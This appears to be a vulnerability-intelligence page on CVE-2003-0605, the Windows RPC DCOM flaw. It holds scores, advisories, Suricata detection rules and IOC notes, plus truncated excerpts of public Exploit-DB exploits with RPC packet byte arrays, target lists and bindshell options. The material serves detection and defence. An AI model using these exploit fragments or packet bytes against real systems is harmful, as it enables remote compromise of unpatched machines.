CVE-2003-0605
published 2003-08-27CVE-2003-0605: The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack…
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
60.80%
99.0th percentile
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 a0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00
bytes↗
05 00 00 03 10 00 00 00 E8 03 00 00 E5 00 00 00 D0 03 00 00 01 00 04 00 05 00 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE 74 2C 96 D2
bytes↗
20 00 00 00 00 00 00 00 20 00 00 00 5C 00 5C 00
bytes↗
5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00
bytes↗
01 10 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 00 00 00 00
bytes↗
46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 46 00 58 00
- →The exploit targets TCP port 135 (primary) but also works on ports 139, 445, and 539 — monitor for malformed DCE/RPC BIND requests (starting with 05 00 0B 03) on all four ports. ↗
- →Detect the characteristic RPC BIND packet header bytes 05 00 0B 03 followed by the DCOM interface UUID a0 01 00 00 ... C0 00 00 00 00 00 00 46 ... 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 in the TCP payload. ↗
- →The exploit request payload contains the distinctive MEOW (4D 45 4F 57) marker and MARB (4D 41 52 42) strings embedded in the DCE/RPC request — alert on these byte sequences within RPC traffic on port 135/139/445. ↗
- →The shellcode NOP sled prefix in the exploit is a repeated Unicode-safe sequence 46 00 58 00 4E 00 42 00 — detect this pattern in RPC request payloads as a strong indicator of exploitation attempt. ↗
- →After successful exploitation, the attacker connects back to a bind shell on the victim; monitor for unexpected inbound connections on port 666 (default) or 4444 originating from a previously targeted host. ↗
- →The Blaster/MSblast/LovSAN worm exploits this CVE; DCE implementations including HP OpenView may hang or terminate upon receiving the malformed exploit packets — monitor for RPC service crashes or hangs following inbound port 135 traffic. ↗
- →The request3 buffer encodes a UNC-style path \\<host>\C$\123456111111111111111111.doc in little-endian Unicode — detect oversized UNC path strings in DCOM RPC requests as an exploitation indicator. ↗
- ·The exploit supports multiple target offsets across Windows NT SP4/SP5/SP6, Windows 2000 (no SP through SP4) in English, Chinese, Polish, German, Japanese, Korean, Mexican, and Kenyan locales, and Windows XP SP0/SP1/SP2 — a single return address will not cover all targets; detection must rely on payload byte patterns rather than specific return addresses. ↗
- ·The exploit is functional on ports beyond 135 (also 139, 445, 593) — perimeter filtering of only port 135 is insufficient to block exploitation. ↗
- ·A return-into-libc variant of this exploit (rpc!exec) was demonstrated to bypass non-executable memory protections including OverflowGuard and StackDefender — NX/DEP-based mitigations alone are not sufficient to prevent exploitation. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r23f-ff9f-8vcc: Various Distributed Computing Environment (DCE) implementations, including HP OpenView, allow remote attackers to cause a denial of service (process h
ghsa_unreviewed·2022-05-03·CVSS 7.5
CVE-2003-0746 [HIGH] GHSA-r23f-ff9f-8vcc: Various Distributed Computing Environment (DCE) implementations, including HP OpenView, allow remote attackers to cause a denial of service (process h
Various Distributed Computing Environment (DCE) implementations, including HP OpenView, allow remote attackers to cause a denial of service (process hang or termination) via certain malformed inputs, as triggered by attempted exploits against the vulnerabilities CVE-2003-0352 or CVE-2003-0605, such as the Blaster/MSblast/LovSAN worm.
GHSA
GHSA-fvvx-2crq-42fr: The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to
ghsa_unreviewed·2022-04-29
CVE-2003-0605 [HIGH] GHSA-fvvx-2crq-42fr: The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
VulnCheck
Windows 2000 SP3 and SP4 PerformScmStage function Vulnerability
vulncheck·2003·CVSS 7.5
CVE-2003-0605 [HIGH] Windows 2000 SP3 and SP4 PerformScmStage function Vulnerability
Windows 2000 SP3 and SP4 PerformScmStage function Vulnerability
The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/Widespread+use+of+RPC+DCOM+Exploit/21/
Suricata
GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt
suricata·2010-09-23
CVE-2003-0528 GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt
GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx
Suricata
GPL NETBIOS DCERPC Remote Activation bind attempt
suricata·2010-09-23
CVE-2003-0528 GPL NETBIOS DCERPC Remote Activation bind attempt
GPL NETBIOS DCERPC Remote Activation bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:17; metadata:created_at 2010_09_23, cve CVE_2003_0528, signature_severity Informational, updated_at 2024_03_08;)
Exploit-DB
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory
exploitdb·2003-11-07
CVE-2003-0605 Microsoft Windows XP/2000 - RPC Remote Non Exec Memory
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory
---
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include
* #include
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* ad
Exploit-DB
Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)
exploitdb·2003-10-09
CVE-2003-0605 Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)
Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)
---
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* And cause a Denial of Service on patched systems (rpc3) */
#include
#include
#include
#include
#include
#include
FILE *fp1;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char r
Exploit-DB
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)
exploitdb·2003-09-20
CVE-2003-0605 Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)
---
/*
RPCDCOM2.c ver1.1
copy by FLASHSKY flashsky at xfocus.org 2003.9.14
*/
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x5
Exploit-DB
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)
exploitdb·2003-09-12
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)
---
/*
dcom2_scanner.c
scan for second dcom vulnerability (MS03-039)
by Doke Scott, doke at udel.edu, 10 Sep 2003
based on work by:
* buildtheb0x presents : dcom/rpc scanner
* ---------------------------------------
* by: kid and farp
and on packet sniffs of MS's dcom2 scanner
*/
#define d_dcom_scan_timeout 5 // max seconds for individual dcom scan
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define null NULL
// for sun spro cc wierdness? seg faults without this
#define my_inet_ntoa(ip) inet_ntoa( *( (struct in_addr *) &ip ) )
static char *program_name;
static int verbose = 0;
int dcom_scan_timeout = d_dcom_scan_timeout;
volatile int timed_out = 0;
volatile int dc
Exploit-DB
Microsoft Windows - 'RPC DCOM' Remote (Universal)
exploitdb·2003-08-07
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (Universal)
Microsoft Windows - 'RPC DCOM' Remote (Universal)
---
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation. It also has several other options including definable
* bindshell and attack ports.
*
* Features:
*
* -d destination host to attack.
*
* -p for port selection as exploit works on ports other than 135(139,445,539 etc)
*
* -r for using a custom return address.
*
* -t to select target type (Offset) , this includes universal offsets for -
* win2k and winXP (Regardless of service pack)
*
* -l to select bindshell port on remote machine (Default: 666)
*
* - Shellcode has been modified to call ExitThread, rath
Exploit-DB
Microsoft Windows - 'RPC DCOM' Remote (2)
exploitdb·2003-07-30
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (2)
Microsoft Windows - 'RPC DCOM' Remote (2)
---
//////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
//
// English - French - Chinese - Polish - German
// Japanese - Korean - Mexican - Kenyan
//
// Tks to all wolrd wide contributors (Public Property)
//
// New Targets ? [email protected]
//
//////////////////////////////////////////////////////////////////////////
#include
#include
#include
#pragma comment(lib,"ws2_32")
#define DWORD unsigned long
WSADATA wsa;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0
Exploit-DB
Microsoft Windows - 'RPC DCOM' Remote (1)
exploitdb·2003-07-29
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote (1)
Microsoft Windows - 'RPC DCOM' Remote (1)
---
//////////////////////////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 18 Targets
// by pHrail and smurfy + some offsets by teos
//
// Targets:
// 0 Win2k Polish nosp ver 5.00.2195
// 1 Win2k Polish +sp3 ver 5.00.2195
// 2 Win2k Spanish +sp4
// 3 Win2k English nosp 1
// 4 Win2k English nosp 2
// 5 Win2k English +sp1
// 6 Win2k English +sp2 1
// 7 Win2k English +sp2 2
// 8 Win2k English +sp3 1
// 9 Win2k English +sp3 2
// 10 Win2k English +sp4
// 11 Win2k China +sp3
// 12 Win2k China +sp4
// 13 Win2k German +sp3
// 14 Win2k Japanese +sp2
// 15 WinXP English nosp ver 5.1.2600
// 16 WinXP English +sp1 1
// 17 WinXP English +sp1 2
// 18 WinXP English +sp2
//
//////////////////////
Exploit-DB
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)
exploitdb·2003-07-26
CVE-2003-0605 Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)
---
/*
DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code
Written by H D Moore
- Usage: ./dcom
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5
Exploit-DB
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow
exploitdb·2003-07-25
CVE-2003-0605 Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow
---
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0x
Exploit-DB
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service
exploitdb·2003-07-21
CVE-2003-0605 Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service
---
// This is a new unpatched vulnerability - NOT the MS03-026
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x3
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006851.htmlhttp://marc.info/?l=bugtraq&m=105880332428706&w=2http://www.cert.org/advisories/CA-2003-19.htmlhttp://www.cert.org/advisories/CA-2003-23.htmlhttp://www.kb.cert.org/vuls/id/326746https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-039https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1118https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A494http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006851.htmlhttp://marc.info/?l=bugtraq&m=105880332428706&w=2http://www.cert.org/advisories/CA-2003-19.htmlhttp://www.cert.org/advisories/CA-2003-23.htmlhttp://www.kb.cert.org/vuls/id/326746https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-039https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1118https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A494
2003-08-27
Published
Exploited in the wild